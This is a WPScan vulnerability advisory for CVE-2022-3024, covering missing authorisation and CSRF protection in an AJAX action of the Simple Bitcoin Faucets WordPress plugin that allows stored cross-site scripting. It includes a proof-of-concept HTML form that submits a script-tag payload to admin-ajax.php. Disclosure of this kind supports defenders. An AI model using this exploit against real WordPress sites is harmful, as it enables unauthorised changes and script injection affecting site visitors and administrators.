WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Simple Bitcoin Faucets <= 1.7.0 - Unauthorised AJAX Call to Stored XSS

Description

The plugin does not have any authorisation and CSRF in an AJAX action, allowing any authenticated users, such as subscribers to call it and add/delete/edit Bonds. Furthermore, due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues

Proof of Concept

Open a page containing the HTML code below as any authenticated user, or make any authenticated user open it via a CSRF attack

<form action="https://example.com/wordpress/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="action" value="SBF_DB_code_manage_action">
    <input type="text" name="B_COMMAND" value="ADD">
    <input type="text" name="B_PARAM" value="10">
    <input type="text" name="B_PARAM2" value="<script>alert(/XSS/)</script>">
    <input type="text" name="B_PARAM3" value="1">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

simple-bitcoin-faucets
No known fix - plugin closed

References

CVE
CVE-2022-3024

Classification

Type

XSS

OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
7f43cb8e-0c1b-4528-8c5c-b81ab42778dc

Timeline

Publicly Published

2022-08-31 (about 1 years ago)

Added

2022-08-31 (about 1 years ago)

Last Updated

2022-08-31 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin